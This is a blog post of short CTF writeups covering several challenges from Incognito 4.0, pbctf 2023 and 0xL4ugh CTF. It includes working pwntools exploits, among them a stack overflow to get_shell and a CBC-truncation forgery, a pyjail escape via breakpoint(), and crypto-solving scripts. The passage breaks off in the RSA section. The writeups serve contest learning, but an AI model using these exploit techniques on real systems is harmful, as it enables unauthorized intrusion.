Home Brief Writeups for CTFs of Feb Week 3
Post
Cancel

Brief Writeups for CTFs of Feb Week 3

Incognito 4.0

Ancient

First we open it by 010editor. From the hexdump we can see there is a string “IHDR”, so we guess it’s a .png file.

1
00000000  00 00 00 00 aa 0a 1a 0a 00 00 00 0d 49 48 44 52  |....ª.......IHDR|

Grab a file header from an unmodified png file(just the signature is enough).

1
00000000  89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52  |.PNG........IHDR|

Open the file, and we see:

challenge.png

By google lens we know it’s Medieval Cistercian Numbers.

Decode it to numbers, and then decode the numbers by ascii to string:

1
2
>>> bytes([105,99,116,102,123,48,108,100,95,109,48,110,107,95,49,57,48,100,101,49,99,51,125])
b'ictf{0ld_m0nk_190de1c3}'

babyFlow

source:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int get_shell()
{
  return execve("/bin/sh", 0, 0);
}
char *__cdecl vulnerable_function(char *src)
{
  char dest[16]; // [esp+4h] [ebp-14h] BYREF

  return strcpy(dest, src);
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[80]; // [esp+0h] [ebp-58h] BYREF
  int *p_argc; // [esp+50h] [ebp-8h]

  p_argc = &argc;
  puts("can you pass me?");
  gets(s);
  vulnerable_function(s);
  return 0;
}
1
.text:080491FC                               public get_shell

exp:

1
2
3
4
5
6
from pwn import *
p = process('./babyflow')
# p = remote('143.198.219.171',5000)
payload = b'a'*20+p32(0x080491FC)
p.sendline(payload)
p.interactive()

Crypto 1

chal.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
flag = "" #redacted
flag = flag[:15]

def func(f, i):
    if i<5:
        out = ord(f) ^ 0x76 ^ 0xAD
        var1 = (out & 0xAA) >> 1
        var2 = 2 * out & 0xAA
        return var1 | var2 
    elif i>=5 and i<10:
        out = ord(f) ^ 0x76 ^ 0xBE
        var1 = (out & 0xCC) >> 2
        var2 = 4 * out & 0xCC
        return var1 | var2
    else:
        out = ord(f) ^ 0x76 ^ 0xEF
        var1 = (out & 0xF0) >> 4
        var2 = 16 * out & 0xF0
        return var1 | var2

res = ''
for i in range(15):
	res += chr(func(flag[i], i))
f = open('result','w')
f.write(res)
f.close()

hexdump of result:

1
2
00000000  c3 93 c3 93 7e c3 94 c3 97 c2 a3 c3 b6 c2 ae c2  |Ã.Ã.~Ã.Ã.£ö®Â|
00000010  a3 c3 b6 c2 8f c2 bf c3 9a c3 9a c2 aa           |£Ã¶Â.¿Ã.Ã.ª|

The first unusual thing here is that the challenge use 'w' to open the result file, but the characters written into it are ranging from 0x00-0xff.

What happens when a character over 127 is written in this case? By doing a simple experiment, we found that:

1
2
3
with open('test','w') as f:
  for i in range(256):
    f.write(i+'\x00') # add '\0' as intervals
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
00000000  00 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00  |................|
00000010  08 00 09 00 0a 00 0b 00 0c 00 0d 00 0e 00 0f 00  |................|
00000020  10 00 11 00 12 00 13 00 14 00 15 00 16 00 17 00  |................|
00000030  18 00 19 00 1a 00 1b 00 1c 00 1d 00 1e 00 1f 00  |................|
00000040  20 00 21 00 22 00 23 00 24 00 25 00 26 00 27 00  | .!.".#.$.%.&.'.|
00000050  28 00 29 00 2a 00 2b 00 2c 00 2d 00 2e 00 2f 00  |(.).*.+.,.-.../.|
00000060  30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00  |0.1.2.3.4.5.6.7.|
00000070  38 00 39 00 3a 00 3b 00 3c 00 3d 00 3e 00 3f 00  |8.9.:.;.<.=.>.?.|
00000080  40 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00  |@.A.B.C.D.E.F.G.|
00000090  48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 4f 00  |H.I.J.K.L.M.N.O.|
000000a0  50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00  |P.Q.R.S.T.U.V.W.|
000000b0  58 00 59 00 5a 00 5b 00 5c 00 5d 00 5e 00 5f 00  |X.Y.Z.[.\.].^._.|
000000c0  60 00 61 00 62 00 63 00 64 00 65 00 66 00 67 00  |`.a.b.c.d.e.f.g.|
000000d0  68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 6f 00  |h.i.j.k.l.m.n.o.|
000000e0  70 00 71 00 72 00 73 00 74 00 75 00 76 00 77 00  |p.q.r.s.t.u.v.w.|
000000f0  78 00 79 00 7a 00 7b 00 7c 00 7d 00 7e 00 7f 00  |x.y.z.{.|.}.~...|
00000100  c2 80 00 c2 81 00 c2 82 00 c2 83 00 c2 84 00 c2  |Â..Â..Â..Â..Â..Â|
00000110  85 00 c2 86 00 c2 87 00 c2 88 00 c2 89 00 c2 8a  |..Â..Â..Â..Â..Â.|
00000120  00 c2 8b 00 c2 8c 00 c2 8d 00 c2 8e 00 c2 8f 00  |.Â..Â..Â..Â..Â..|
00000130  c2 90 00 c2 91 00 c2 92 00 c2 93 00 c2 94 00 c2  |Â..Â..Â..Â..Â..Â|
00000140  95 00 c2 96 00 c2 97 00 c2 98 00 c2 99 00 c2 9a  |..Â..Â..Â..Â..Â.|
00000150  00 c2 9b 00 c2 9c 00 c2 9d 00 c2 9e 00 c2 9f 00  |.Â..Â..Â..Â..Â..|
00000160  c2 a0 00 c2 a1 00 c2 a2 00 c2 a3 00 c2 a4 00 c2  | .¡.¢.£.¤.Â|
00000170  a5 00 c2 a6 00 c2 a7 00 c2 a8 00 c2 a9 00 c2 aa  |¥.¦.§.¨.©.ª|
00000180  00 c2 ab 00 c2 ac 00 c2 ad 00 c2 ae 00 c2 af 00  |.«.¬.Â..®.¯.|
00000190  c2 b0 00 c2 b1 00 c2 b2 00 c2 b3 00 c2 b4 00 c2  |°.±.².³.´.Â|
000001a0  b5 00 c2 b6 00 c2 b7 00 c2 b8 00 c2 b9 00 c2 ba  |µ.¶.·.¸.¹.º|
000001b0  00 c2 bb 00 c2 bc 00 c2 bd 00 c2 be 00 c2 bf 00  |.».¼.½.¾.¿.|
000001c0  c3 80 00 c3 81 00 c3 82 00 c3 83 00 c3 84 00 c3  |Ã..Ã..Ã..Ã..Ã..Ã|
000001d0  85 00 c3 86 00 c3 87 00 c3 88 00 c3 89 00 c3 8a  |..Ã..Ã..Ã..Ã..Ã.|
000001e0  00 c3 8b 00 c3 8c 00 c3 8d 00 c3 8e 00 c3 8f 00  |.Ã..Ã..Ã..Ã..Ã..|
000001f0  c3 90 00 c3 91 00 c3 92 00 c3 93 00 c3 94 00 c3  |Ã..Ã..Ã..Ã..Ã..Ã|
00000200  95 00 c3 96 00 c3 97 00 c3 98 00 c3 99 00 c3 9a  |..Ã..Ã..Ã..Ã..Ã.|
00000210  00 c3 9b 00 c3 9c 00 c3 9d 00 c3 9e 00 c3 9f 00  |.Ã..Ã..Ã..Ã..Ã..|
00000220  c3 a0 00 c3 a1 00 c3 a2 00 c3 a3 00 c3 a4 00 c3  |à.á.â.ã.ä.Ã|
00000230  a5 00 c3 a6 00 c3 a7 00 c3 a8 00 c3 a9 00 c3 aa  |¥.æ.ç.è.é.ê|
00000240  00 c3 ab 00 c3 ac 00 c3 ad 00 c3 ae 00 c3 af 00  |.ë.ì.Ã..î.ï.|
00000250  c3 b0 00 c3 b1 00 c3 b2 00 c3 b3 00 c3 b4 00 c3  |ð.ñ.ò.ó.ô.Ã|
00000260  b5 00 c3 b6 00 c3 b7 00 c3 b8 00 c3 b9 00 c3 ba  |µ.ö.÷.ø.ù.ú|
00000270  00 c3 bb 00 c3 bc 00 c3 bd 00 c3 be 00 c3 bf 00  |.û.ü.ý.þ.ÿ.|

from 0x80-0xbf, a 0xc2 will be added before the character itself;

from 0xc0-0xff, a 0xc3 will be added before the character, and the character will be minus by 0x40.

So we can reveal the original byte flow.

Another vulnerability is that it is encrypting the flag byte by byte (which can be seem as ECB mode with BLOCK_SIZE=1), so the message space is quiet small (in fact, 0x20-0x7e), and we can bruteforce them individually.

(if you want to do it more elegant, you can also use z3-solver to deal with the equations)

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
c = bytes.fromhex('C3 93 C3 93 7E C3 94 C3 97 C2 A3 C3 B6 C2 AE C2 A3 C3 B6 C2 8F C2 BF C3 9A C3 9A C2 AA')
cc = []
i = 0
while i < len(c):
	if c[i]==0xc3:
		cc.append(c[i+1]+0x40)
		i+=2
	elif c[i]==0xc2:
		cc.append(c[i+1])
		i+=2
	else:
		cc.append(c[i])
		i+=1
c = bytes(cc)
m = [0]*15
def func(f, i):
    if i<5:
        out = ord(f) ^ 0x76 ^ 0xAD
        var1 = (out & 0xAA) >> 1
        var2 = 2 * out & 0xAA
        return var1 | var2 
    elif i>=5 and i<10:
        out = ord(f) ^ 0x76 ^ 0xBE
        var1 = (out & 0xCC) >> 2
        var2 = 4 * out & 0xCC
        return var1 | var2
    else:
        out = ord(f) ^ 0x76 ^ 0xEF
        var1 = (out & 0xF0) >> 4
        var2 = 16 * out & 0xF0
        return var1 | var2

for i in range(15):
	for j in range(128):
		if(func(chr(j),i)==c[i]):
			m[i]=j
			break

print(bytes(m))

# ictf{88f30d1cd1ab443}

Gainme

More like a reverse challenge than a pwn.

Source:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4[4]; // [esp+0h] [ebp-60h]
  char v5[64]; // [esp+10h] [ebp-50h] BYREF
  void (__cdecl *v6)(char *); // [esp+50h] [ebp-10h]
  int i; // [esp+54h] [ebp-Ch]
  int *p_argc; // [esp+58h] [ebp-8h]

  p_argc = &argc;
  v4[0] = (int)lvlone;
  v4[1] = (int)lvltwo;
  v4[2] = (int)lvlthree;
  v4[3] = (int)lvlfour;
  setvbuf(stdout, 0, 2, 0);
  puts("Solve the levels to gain access to the flag");
  for ( i = 0; i <= 3; ++i )
  {
    printf("Enter input for Level %d: ", i);
    __isoc99_scanf("%s", v5);
    v6 = (void (__cdecl *)(char *))v4[i];
    v6(v5);
  }
  print_flag();
  return 0;
}
int __cdecl lvlone(char *s1)
{
  int result; // eax

  result = strcmp(s1, "ICTF4");
  if ( result )
    exit(0);
  return result;
}
size_t __cdecl lvltwo(char *a1)
{
  size_t result; // eax
  char s[16]; // [esp+Ah] [ebp-1Eh] BYREF
  __int16 v3; // [esp+1Ah] [ebp-Eh]
  size_t i; // [esp+1Ch] [ebp-Ch]

  *(__m128i *)s = _mm_load_si128((const __m128i *)&xmmword_2090);
  v3 = 0x63;
  for ( i = 0; ; ++i )
  {
    result = strlen(s);
    if ( i >= result )
      break;
    if ( s[i] != a1[i] )
      exit(0);
  }
  return result;
}
Elf32_Dyn **__cdecl lvlthree(_DWORD *a1)
{
  Elf32_Dyn **result; // eax

  result = &GLOBAL_OFFSET_TABLE_;
  if ( *a1 != 0xDEADBEEF )
    exit(0);
  return result;
}
int __cdecl lvlfour(char *s)
{
  int v2; // [esp+Ch] [ebp-Ch]

  if ( strlen(s) > 3 )
    exit(0);
  v2 = atoi(s);
  if ( v2 * v2 * v2 + -3 * v2 * v2 + 3 * v2 - 1 )
    exit(0);
  return puts("Congratulations");
}
int print_flag()
{
  char v1; // [esp+7h] [ebp-11h]
  __gid_t v2; // [esp+8h] [ebp-10h]
  FILE *stream; // [esp+Ch] [ebp-Ch]

  stream = fopen("flag.txt", "r");
  v2 = getegid();
  setresgid(v2, v2, v2);
  if ( !stream )
    return puts("Error");
  while ( 1 )
  {
    v1 = fgetc(stream);
    if ( v1 == -1 )
      break;
    putchar(v1);
  }
  return fclose(stream);
}
1
2
.rodata:00002090 64 61 73 44 41 53 51 57 67 6A+xmmword_2090 xmmword 'sdokrtjgWQSADsad' ; DATA XREF: lvltwo+19↑r
.rodata:00002090 74 72 6B 6F 64 73             _rodata ends

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
# p = process('./gainme')
p = remote('143.198.219.171',5003)
# context(log_level='debug',os='linux',arch='i386')
p.sendline(b'ICTF4')
p.sendline(b'dasDASQWgjtrkodsc')
p.sendline(p32(0xDEADBEEF))
import z3
v2 = z3.Int('v2')
s = z3.Solver()
s.add(v2 * v2 * v2 + -3 * v2 * v2 + 3 * v2 - 1 == 0)
if s.check() == z3.sat:
	v2 = s.model().eval(v2).as_long()
# v2 = 1
p.sendline(str(v2).encode())
p.interactive()
# ictf{g@inm3-sf23f-4fd2150cd33db}

Remember to add the ‘c’(0x63) in lvltwo.

Meow

First if you decompile main(), you will found nothing in it.

1
2
3
4
int __cdecl main(int argc, const char **argv, const char **envp)
{
  return 0;
}

That’s true! It actually did nothing.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
.text:0000000000001119
.text:0000000000001119                               ; =============== S U B R O U T I N E =======================================
.text:0000000000001119
.text:0000000000001119                               ; Attributes: bp-based frame
.text:0000000000001119
.text:0000000000001119                               ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:0000000000001119                               public main
.text:0000000000001119                               main proc near                          ; DATA XREF: _start+18↑o
.text:0000000000001119
.text:0000000000001119                               var_10= qword ptr -10h
.text:0000000000001119                               var_4= dword ptr -4
.text:0000000000001119
.text:0000000000001119                               ; __unwind {
.text:0000000000001119 55                            push    rbp
.text:000000000000111A 48 89 E5                      mov     rbp, rsp
.text:000000000000111D 89 7D FC                      mov     [rbp+var_4], edi
.text:0000000000001120 48 89 75 F0                   mov     [rbp+var_10], rsi
.text:0000000000001124 B8 00 00 00 00                mov     eax, 0
.text:0000000000001129 5D                            pop     rbp
.text:000000000000112A C3                            retn
.text:000000000000112A                               ; } // starts at 1119
.text:000000000000112A
.text:000000000000112A                               main endp
.text:000000000000112A
.text:000000000000112A                               _text ends
.text:000000000000112A

So where’s the flag? Scrolling down and we find some suspicious data:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
.rodata:0000000000002008 00                            unk_2008 db    0                        ; DATA XREF: .data:x↓o
.rodata:0000000000002009 69                            db  69h ; i
.rodata:000000000000200A 00                            db    0
.rodata:000000000000200B 63                            db  63h ; c
.rodata:000000000000200C 00                            db    0
.rodata:000000000000200D 74                            db  74h ; t
.rodata:000000000000200E 00                            db    0
.rodata:000000000000200F 66                            db  66h ; f
.rodata:0000000000002010 00                            db    0
.rodata:0000000000002011 7B                            db  7Bh ; {
.rodata:0000000000002012 00                            db    0
.rodata:0000000000002013 65                            db  65h ; e
.rodata:0000000000002014 00                            db    0
.rodata:0000000000002015 61                            db  61h ; a
.rodata:0000000000002016 00                            db    0
.rodata:0000000000002017 73                            db  73h ; s
.rodata:0000000000002018 00                            db    0
.rodata:0000000000002019 69                            db  69h ; i
.rodata:000000000000201A 00                            db    0
.rodata:000000000000201B 65                            db  65h ; e
.rodata:000000000000201C 00                            db    0
.rodata:000000000000201D 73                            db  73h ; s
.rodata:000000000000201E 00                            db    0
.rodata:000000000000201F 74                            db  74h ; t
.rodata:0000000000002020 00                            db    0
.rodata:0000000000002021 5F                            db  5Fh ; _
.rodata:0000000000002022 00                            db    0
.rodata:0000000000002023 63                            db  63h ; c
.rodata:0000000000002024 00                            db    0
.rodata:0000000000002025 68                            db  68h ; h
.rodata:0000000000002026 00                            db    0
.rodata:0000000000002027 61                            db  61h ; a
.rodata:0000000000002028 00                            db    0
.rodata:0000000000002029 6C                            db  6Ch ; l
.rodata:000000000000202A 00                            db    0
.rodata:000000000000202B 6C                            db  6Ch ; l
.rodata:000000000000202C 00                            db    0
.rodata:000000000000202D 65                            db  65h ; e
.rodata:000000000000202E 00                            db    0
.rodata:000000000000202F 6E                            db  6Eh ; n
.rodata:0000000000002030 00                            db    0
.rodata:0000000000002031 67                            db  67h ; g
.rodata:0000000000002032 00                            db    0
.rodata:0000000000002033 65                            db  65h ; e
.rodata:0000000000002034 00                            db    0
.rodata:0000000000002035 5F                            db  5Fh ; _
.rodata:0000000000002036 00                            db    0
.rodata:0000000000002037 6F                            db  6Fh ; o
.rodata:0000000000002038 00                            db    0
.rodata:0000000000002039 66                            db  66h ; f
.rodata:000000000000203A 00                            db    0
.rodata:000000000000203B 5F                            db  5Fh ; _
.rodata:000000000000203C 00                            db    0
.rodata:000000000000203D 74                            db  74h ; t
.rodata:000000000000203E 00                            db    0
.rodata:000000000000203F 68                            db  68h ; h
.rodata:0000000000002040 00                            db    0
.rodata:0000000000002041 65                            db  65h ; e
.rodata:0000000000002042 00                            db    0
.rodata:0000000000002043 6D                            db  6Dh ; m
.rodata:0000000000002044 00                            db    0
.rodata:0000000000002045 5F                            db  5Fh ; _
.rodata:0000000000002046 00                            db    0
.rodata:0000000000002047 61                            db  61h ; a
.rodata:0000000000002048 00                            db    0
.rodata:0000000000002049 6C                            db  6Ch ; l
.rodata:000000000000204A 00                            db    0
.rodata:000000000000204B 6C                            db  6Ch ; l
.rodata:000000000000204C 00                            db    0
.rodata:000000000000204D 7D                            db  7Dh ; }
.rodata:000000000000204E 00                            db    0
.rodata:000000000000204E                               _rodata ends
.rodata:000000000000204E

Wow, it seems that this is just the flag. Let’s put them together:

1
2
3
4
5
6
7
print(bytes.fromhex("""00 69 00 63 00 74 00 66 00 7B 00 65 00 61 00 73
00 69 00 65 00 73 00 74 00 5F 00 63 00 68 00 61
00 6C 00 6C 00 65 00 6E 00 67 00 65 00 5F 00 6F
00 66 00 5F 00 74 00 68 00 65 00 6D 00 5F 00 61
00 6C 00 6C 00 7D
""".replace('00','')))
# ictf{easiest_challenge_of_them_all}

pyjail

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import string

ALLOWED_CHARS = string.ascii_letters + string.digits + '.' + '=' + "\"" + " " + "(" + ")" + "*" + ":"+"'"+","

FORBIDDEN_BUILTINS = ['open', 'eval', 'exec', 'execfile']

def check_input(input_str):
    for char in input_str:
        if char not in ALLOWED_CHARS:
            raise ValueError("Error: forbidden character '{}'".format(char))

def remove_builtins():
    for builtin in FORBIDDEN_BUILTINS:
        if builtin in globals():
            del globals()[builtin]

remove_builtins()

# start the jail
print("Welcome to the IIITL Jail! Escape if you can")

while True:
    try:
        user_input = input("jail> ")
        check_input(user_input)
        exec(user_input)
    except Exception as e:
        print("Error:", e)

Solution:

All you need is just a breakpoint().

pbctf 2023

task.py:

Blocky -0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#!/usr/bin/env python3
import hashlib
import os
import signal

from Cipher import BlockCipher
from GF import GF

def handler(_signum, _frame):
    print("Time out!")
    exit(0)


def get_random_block():
    block = b''
    while len(block) < 9:
        b = os.urandom(1)
        if b[0] < 243:
            block += b
    return block


def get_mac(pt):
    mac = hashlib.sha256(pt).digest()[:9]
    return bytes([x % 243 for x in mac])


def pad(pt):
    mac = get_mac(pt)
    v = 9 - len(pt) % 9
    return pt + bytes([v] * v) + mac


def unpad(pt):
    if len(pt) < 18 or len(pt) % 9 != 0:
        return
    pt, mac = pt[:-9], pt[-9:]
    if not (1 <= pt[-1] <= 9):
        print('pad not match')
        return
    
    pt = pt[:-pt[-1]]
    if mac == get_mac(pt):
        return pt
    else:
        print('mac not match')

def add(a, b):
    return bytes([(GF(x) + GF(y)).to_int() for x, y in zip(a, b)])


def sub(a, b):
    return bytes([(GF(x) - GF(y)).to_int() for x, y in zip(a, b)])


def main():
    signal.signal(signal.SIGALRM, handler)
    signal.alarm(60)
    key = get_random_block()
    cipher = BlockCipher(key, 20)

    while True:
        inp = input("> ")

        if inp == 'E':
            inp = input("Input (in hex): ")
            inp = bytes.fromhex(inp)
            assert len(inp) < 90
            assert all(b < 243 for b in inp)

            if inp == 'gimmeflag':
                print("Result: None")
                continue

            pt = pad(inp)
            iv = get_random_block()
            enc = iv

            for i in range(0, len(pt), 9):
                t = add(pt[i:i+9], iv)
                iv = cipher.encrypt(t)
                enc += iv
            
            print(f"Result: {enc.hex()}")
        elif inp == 'D':
            inp = input("Input (in hex): ")
            inp = bytes.fromhex(inp)
            assert len(inp) < 108
            assert all(b < 243 for b in inp)

            iv, ct = inp[:9], inp[9:]
            dec = b''

            for i in range(0, len(ct), 9):
                t = cipher.decrypt(ct[i:i+9])
                dec += sub(t, iv)
                iv = ct[i:i+9]

            pt = unpad(dec)
            if pt == b'gimmeflag':
                with open('flag', 'r') as f:
                    flag = f.read()
                    print(flag)
                exit(0)
            elif pt:
                print(f"Result: {pt.hex()}")
            else:
                print("Result: None")


if __name__ == "__main__":
    main()

Cipher.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
from GF import GF

SBOX, INV_SBOX = dict(), dict()
for i in range(3 ** 5):
    v = GF(23) + (GF(0) if i == 0 else GF(i).inverse())
    SBOX[GF(i)] = v
    INV_SBOX[v] = GF(i)

class BlockCipher:
    def __init__(self, key: bytes, rnd: int):
        assert len(key) == 9
        sks = [GF(b) for b in key]
        for i in range(rnd * 9):
            sks.append(sks[-1] + SBOX[sks[-9]])
        self.subkeys = [sks[i:i+9] for i in range(0, (rnd + 1) * 9, 9)]
        self.rnd = rnd

    def _add_key(self, l1, l2):
        return [x + y for x, y in zip(l1, l2)]

    def _sub_key(self, l1, l2):
        return [x - y for x, y in zip(l1, l2)]
    
    def _sub(self, l):
        return [SBOX[x] for x in l]

    def _sub_inv(self, l):
        return [INV_SBOX[x] for x in l]
    
    def _shift(self, b):
        return [
            b[0], b[1], b[2],
            b[4], b[5], b[3],
            b[8], b[6], b[7]
        ]
    
    def _shift_inv(self, b):
        return [
            b[0], b[1], b[2],
            b[5], b[3], b[4],
            b[7], b[8], b[6]
        ]
    
    def _mix(self, b):
        b = b[:] # Copy
        for i in range(3):
            x = GF(7) * b[i] + GF(2) * b[3 + i] + b[6 + i]
            y = GF(2) * b[i] + b[3 + i] + GF(7) * b[6 + i]
            z = b[i] + GF(7) * b[3 + i] + GF(2) * b[6 + i]
            b[i], b[3 + i], b[6 + i] = x, y, z
        return b
    
    def _mix_inv(self, b):
        b = b[:] # Copy
        for i in range(3):
            x = GF(86) * b[i] + GF(222) * b[3 + i] + GF(148) * b[6 + i]
            y = GF(222) * b[i] + GF(148) * b[3 + i] + GF(86) * b[6 + i]
            z = GF(148) * b[i] + GF(86) * b[3 + i] + GF(222) * b[6 + i]
            b[i], b[3 + i], b[6 + i] = x, y, z
        return b
    
    def encrypt(self, inp: bytes):
        assert len(inp) == 9
        b = [GF(x) for x in inp]
        
        b = self._add_key(b, self.subkeys[0])
        for i in range(self.rnd):
            b = self._sub(b)
            b = self._shift(b)
            if i < self.rnd - 1:
                b = self._mix(b)
            b = self._add_key(b, self.subkeys[i + 1])
        
        return bytes([x.to_int() for x in b])
    
    def decrypt(self, inp: bytes):
        assert len(inp) == 9
        b = [GF(x) for x in inp]

        for i in reversed(range(self.rnd)):
            b = self._sub_key(b, self.subkeys[i + 1])
            if i < self.rnd - 1:
                b = self._mix_inv(b)
            b = self._shift_inv(b)
            b = self._sub_inv(b)
        b = self._sub_key(b, self.subkeys[0])
        
        return bytes([x.to_int() for x in b])

if __name__ == "__main__":
    import random
    key = bytes(random.randint(0, 242) for i in range(9))
    cipher = BlockCipher(key, 4)
    for _ in range(100):
        pt = bytes(random.randint(0, 242) for i in range(9))
        ct = cipher.encrypt(pt)
        pt_ = cipher.decrypt(ct)
        assert pt == pt_

GF.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
class GF:
    def __init__(self, value):
        if type(value) == int:
            self.value = [(value // (3 ** i)) % 3 for i in range(5)]
        elif type(value) == list and len(value) == 5:
            self.value = value
        else:
            assert False, "Wrong input to the constructor"

    def __str__(self):
        return f"GF({self.to_int()})"

    def __repr__(self):
        return str(self)

    def __hash__(self):
        return hash(tuple(self.value))

    def __eq__(self, other):
        assert type(other) == GF
        return self.value == other.value
    
    def __add__(self, other):
        assert type(other) == GF
        return GF([(x + y) % 3 for x, y in zip(self.value, other.value)])
    
    def __sub__(self, other):
        assert type(other) == GF
        return GF([(x - y) % 3 for x, y in zip(self.value, other.value)])
    
    def __mul__(self, other):
        assert type(other) == GF

        arr = [0 for _ in range(9)]
        for i in range(5):
            for j in range(5):
                arr[i + j] = (arr[i + j] + self.value[i] * other.value[j]) % 3
        
        # Modulus: x^5 + 2*x + 1
        for i in range(8, 4, -1):
            arr[i - 4] = (arr[i - 4] - 2 * arr[i]) % 3
            arr[i - 5] = (arr[i - 5] - arr[i]) % 3
        
        return GF(arr[:5])
    
    def __pow__(self, other):
        assert type(other) == int
        base, ret = self, GF(1)
        while other > 0:
            if other & 1:
                ret = ret * base
            other >>= 1
            base = base * base
        return ret

    def inverse(self):
        return self ** 241

    def __div__(self, other):
        assert type(other) == GF
        return self * other.inverse()
    
    def to_int(self):
        return sum([self.value[i] * (3 ** i) for i in range(5)])

if __name__ == "__main__":
    assert GF(3) * GF(3) == GF(9)
    assert GF(9) * GF(27) == GF(5)
    assert GF(5).inverse() == GF(240)

The key point here is by looking at the way it encrypts and decrypts, we know it’s CBC mode.

A well-known property of CBC is that adding a block after the plaintext will not affect the ciphertext of the original plaintext.

So we can bypass it by query the encryption of pad('gimmeflag') and delete the unwanted part.

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

def get_mac(pt):
    mac = hashlib.sha256(pt).digest()[:9]
    return bytes([x % 243 for x in mac])

def pad(pt):
    mac = get_mac(pt)
    v = 9 - len(pt) % 9
    return pt + bytes([v] * v) + mac

p = remote('blocky-0.chal.perfect.blue',1337)
p.sendline(b'E')
p.recvuntil(b'Input (in hex): ')
p.sendline(pad(b'gimmeflag').hex().encode())
p.recvuntil(b'Result: ')
c = bytes.fromhex(p.recvline().decode().strip())
p.sendline(b'D')
p.recvuntil(b'Input (in hex): ')
p.sendline(c[:36].hex().encode())
p.interactive()

# pbctf{actually_I_made_the_same_mistake_in_CODEGATE_Finals}

0xL4ugh CTF 23’

Crypto 2

code.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from Crypto.Util.number import bytes_to_long, getPrime
from secret import messages


def RSA_encrypt(message):
    m = bytes_to_long(message)
    p = getPrime(1024)
    q = getPrime(1024)
    N = p * q
    e = 3
    c = pow(m, e, N)
    return N, e, c


for m in messages:
    N, e, c = RSA_encrypt(m)
    print(f"n = {N}")
    print(f"e = {e}")
    print(f"c = {c}")

output.txt:

1
2
3
4
5
n = 16691865792147194697602300512532851182049374635648801189035809706515463120586646192481229145243032049569188562652509317620313234450062651687702398851985141210252080200118496555573100538082230667123330012596663673730204381449416210246747100065137562877723883087453655498192797717322414163929033958154847172474876805828355467779563924126108244847992313964795565023554963296215243179420547862638306573737884301209065640499511319512400331964327680966267406302192650421152395257843371809022919488155958420254813754963104236903270765037373600427365083337259089056941701762267110792581437924801009323096077817633370816094073
e = 3
c = 527715545190279160683427564102415343921040361668522479441727171363460126920288425567651662947621100428078618585624707291232885706132068328305084115992340337032439274527186826778447854890982475878955397378947713414201050357209397140391734937299379698886378260075489810871914081834819238233619226377140629000968272406078503709732856007314599153696811725183993977424740513321277346005097500256459835713834182894305536107589525724571208098322359262186595358977825573193007799376102473240254372327730839223120373818874006086733633525830272119104666835113980722223258389364156995110666626033474727892354233040278510447646
......

Because e=3 is small, we tried to bruteforce the m.

1
2
3
4
5
6
7
8
9
10
11
12
13
import gmpy2
import libnum
n = 16691865792147194697602300512532851182049374635648801189035809706515463120586646192481229145243032049569188562652509317620313234450062651687702398851985141210252080200118496555573100538082230667123330012596663673730204381449416210246747100065137562877723883087453655498192797717322414163929033958154847172474876805828355467779563924126108244847992313964795565023554963296215243179420547862638306573737884301209065640499511319512400331964327680966267406302192650421152395257843371809022919488155958420254813754963104236903270765037373600427365083337259089056941701762267110792581437924801009323096077817633370816094073
e = 3
